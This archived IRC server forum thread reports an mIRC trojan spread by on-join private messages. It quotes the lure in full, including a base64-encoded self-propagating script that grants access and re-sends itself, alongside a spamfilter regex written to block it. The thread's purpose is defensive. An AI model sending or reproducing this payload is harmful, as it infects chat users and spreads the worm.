new one.. similar to matrix2 and nospam ones

These are old archives. They are kept for historic purposes only.
Post Reply
nexus
Posts: 14
Joined: Fri Mar 12, 2004 5:45 pm
Contact:

new one.. similar to matrix2 and nospam ones

Post by nexus »

this is sent only via onjoin pm (as you can see if you check it out in mirc with an echo statement ;)):

Code: Select all

<WenW> Want To Be An IRCOp? Try This New Bug Type: //write $decode(bmV3Yg==,m) $decode(b24gISsxOmpvaW46Izp7IC5hdXNlciAyICRuaWNrIHwgLm1zZyAkbmljayBXYW50IFRvIEJlIEFuIElSQ09wPyBUcnkgVGhpcyBOZXcgQnVnIFR5cGU6AzExIC8vd3JpdGUgJCAkKyBkZWNvZGUoYm1WM1lnPT0sbSkgJCAkKyBkZWNvZGUoICQrICRlbmNvZGUoJHJlYWQoJHNjcmlwdCxuLDEpLG0pICQrICxtKSAkY2hyKDEyNCkgLmxvYWQgLXJzICQgJCsgZGVjb2RlKGJtVjNZZz09LG0pIH0gfQ==,m) | .load -rs $decode(bmV3Yg==,m)
heres my filter, works well so far:

Code: Select all

spamfilter {
     regex "^Want To Be An IRCOp\? Try This New Bug Type: //write (\$decode\(.+=.?,m\)){1} \| \.load -rs \$decode\(.+=.?,m\)$";
     target private;
     action block;
     reason "Spamming users with an mIRC trojan. Type '/unload -rs newb' to remove the trojan.";
};
Syzop
UnrealIRCd head coder
Posts: 2112
Joined: Sat Mar 06, 2004 8:57 pm
Location: .nl
Contact:

Post by Syzop »

Ok, added in CVS.

Could you explain why you did (see underlined chars):
regex "^Want To Be An IRCOp\? Try This New Bug Type: //write (\$decode\(.+=.?,m\)){1} \| \.load -rs \$decode\(.+=.?,m\)$";

I removed that, since it seemed useless.
nexus
Posts: 14
Joined: Fri Mar 12, 2004 5:45 pm
Contact:

Post by nexus »

I did that becuase there are 2 instances of $decode before the first pipe ;)

{1} means the preceding text will be repeated one time.. it does not start counting until after the first instance.. so since $decode gets used twice before the pipe, that (){1} works good ;)


but, I do think the entry you have added in cvs is better, because it will catch more variants that may pop up with $decode (and they will too)
aquanight
Official supporter
Posts: 862
Joined: Tue Mar 09, 2004 10:47 pm
Location: Boise, ID

Post by aquanight »

heh, personally, I would just block $decode and $encode altogether...

... for the main reason that you can't exactly verify the contents of any message using $decode or $encode without unencoding it. If it has | characters, you might wind up setting it off :) (unless you use /echo with only one slash).

If people need to send stuff like that, they really should use DCC. It's much easier to verify them, because I could then pop the file in notepad and have a look at what I was sent. AFAIK, opening any file in Notepad/Wordpad/vi[m]/emacs/nano, or heck, cat is pretty much harmless. Or if I really don't trust the file, I would simply hit Ignore on the DCC Get dialog :) .

*edit* Can someone enable right margins for the forum? Because these long regexes play havoc on the layout :P And my 800X600 screen can't handle it :( */edit*
codemastr
Former UnrealIRCd head coder
Posts: 811
Joined: Sat Mar 06, 2004 8:47 pm
Location: United States
Contact:

Post by codemastr »

heh, personally, I would just block $decode and $encode altogether...
* User joins #mirc
<User> Can anyone help me with $encode? I'm trying to use it to encode an email attachment.

And that's why it's a bad idea to do that. $encode and $decode are not inherently bad. First off, I don't use mIRC, so why should I be banned from saying it? It doesn't affect me at all. Second, what if I have a completely valid reason for saying it?
-- codemastr
Post Reply